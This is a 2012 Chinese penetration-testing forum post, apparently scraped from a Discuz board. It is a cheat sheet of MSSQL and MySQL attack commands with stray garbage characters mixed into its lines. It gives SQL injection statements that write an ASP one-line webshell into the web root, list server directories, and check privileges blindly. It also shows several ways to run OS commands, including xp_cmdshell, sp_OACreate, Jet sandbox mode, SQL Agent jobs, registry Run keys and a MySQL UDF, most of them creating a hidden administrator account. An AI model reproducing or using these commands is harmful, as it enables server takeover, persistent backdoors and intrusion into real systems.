中国网络渗透测试联盟

标题: mssql实用命令及导出一句话 [打印本页]

作者: admin    时间: 2012-9-13 17:49
标题: mssql实用命令及导出一句话
MSSQL语句导出一句话木马
5 k: l4 L* h) b6 \/ l首先确定网站的WEB路径$ ~; y+ h( h0 t; l
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马( Q! H  D% C+ @$ s1 {
8 h! N5 g$ n6 P) b7 _1 G, a
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- : }' ?0 A2 o/ e( w) U
//将一句话木马插入表中- W, {# H3 C( p" S7 b7 ?5 F

& b9 c4 O1 V4 A- F6 \+ v( n5 D;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
0 I6 O% u5 z$ B2 P' W//导出一个ASP文件; n+ p7 o& r; S9 B+ E* f

) R) Y$ Y# j1 e( l, {8 _- W0 P9 a9 K9 s# U6 X
关于MSSQL列目录
$ m; r, Y5 D4 U/ s1 u' x;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
6 p, o0 p2 D2 A: p  o+ c8 p% J: dInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表& {5 i+ U; X6 C" a* n' z
- c$ j$ }: o5 O* l, ?
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录% i$ |' o/ [+ N% v5 H
( F# z  b6 z1 a6 `: x7 j
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
+ X& D2 C# A3 S3 B6 @! D1 c, w2 w. n% ]2 A" R8 b" X
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符6 K4 I0 d, ~9 E7 l' I: z6 L% Y3 l0 X
! w5 _- U$ C- j: e* E+ @' R

# U+ v) r$ [4 s  d# D, M+ r, a% I数据库版本和权限查看
* A8 ]4 m" G9 q7 o* W3 kand 1=(select @@VERSION) //查看详细的数据库信息.
2 N3 A8 [. O( z  f8 ]4 u, l" Yand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
4 C1 A1 K( n5 R; m; R$ O4 w8 Land 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER$ F+ h6 i2 T! Q, Z: c& z
: H* t2 r+ v" f# S. m
5 `# D) d, D9 ~$ Y, B% l
1.利用xp_cmdshell执行命令5 c. |3 P, u/ X1 Z1 w4 ^" B0 Z
exec master..xp_cmdshell 'net user rfire 123456 /add'2 q- @# P) l4 x! `$ p
exec master..xp_cmdshell 'net localgroup administrators rfire /add'& Z/ g% P7 O8 ]
6 @9 s: E3 w* w
恢复xp_cmdshell存储过程' U# S& N' g: A9 f
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& S  g- T* }. Y( m& |" r) A; N$ N/ |  f! w; f# b9 P. ]1 S
+ e7 [; S# j: z% S6 Y( J0 L2 a& y
2.利用SP_OAcreate和SP_OAMETHOD执行命令/ ]! [5 Q( w% P; I" Q
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下8 _9 J# o0 Z# S& ?4 O6 C) c5 U: @
DECLARE @shell INT //建立一个@shell实体: k  I" H0 c9 z8 ^* R
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例3 F& m5 g( b+ B* A  u
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
8 m- e4 N; \3 t0 T% U
0 J5 k& x5 W+ D) Q0 u) @: }! g9 Q- Y; M8 E7 a
3.利用沙盒模式1 Z0 I( A$ p# o. @2 h4 i
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
- i. V2 V! V( X. ^开启沙盒模式:- {" o: Q8 A4 t  L( m
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
6 ^  O  c) x0 D
% {( e% y' v: D9 Z" K$ |" E执行命令:
/ y* u. b0 l" F5 c2 `) m4 GSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
& Y- R$ Q3 {  b3 D( y0 _  V: n# z1 a+ m2 J* q7 W7 V% m8 K* b% V
  m6 u% ]' a6 }6 u
4.利用SQL代理执行命令" y0 t. d' `3 m% n! k" s! |
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
; D+ S0 k+ d+ R! d- ?' }# D5 ]3 f. o0 S' i, e  Z6 B: ^
执行命令:$ h6 J4 D: Z% j/ ?2 C! a
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
  x* p4 K' o1 q( {5 p$ c" ~7 Texec sp_add_job 'x'
( r! R. h; X; hexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
+ h8 U; L3 T: U0 aexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
* F- ^) P5 f3 B/ B) X
" q7 Y, `1 z) o1 L5 d! t! K, e9 h5 @7 q0 g4 \
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
* l! `2 d( P: {& m6 G8 q5 X6 {3 oEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'2 o& W1 W& \) u

* Y8 ~- Y4 X, \, u! A* \# e! `% I$ m8 U! F! h
6.MYSQL的命令执行
1 q1 |& _4 Y' G' }MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限), b/ r/ Z5 g3 z# n& `0 f* L
首先要在su.php下导出c:\windows\udf.dll
$ `* H* w) `# m" k, w+ O导出后执行创建自定义函数命令:
* \; n3 u: o$ l3 d- Q! O6 h7 KCreate Function cmdshell returns string soname 'udf.dll'3 {, ~5 O. B- Q( c$ H" \9 g
执行命令# c" z$ X9 x+ q3 I
select cmdshell('net user rfire 123456 /add')7 k2 B0 T1 Q/ ~! B* y, Y( B" S6 w  z
执行后删除函数 drop function cmdshell! v9 \/ w: e7 ?1 n) Q1 J0 _  O





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2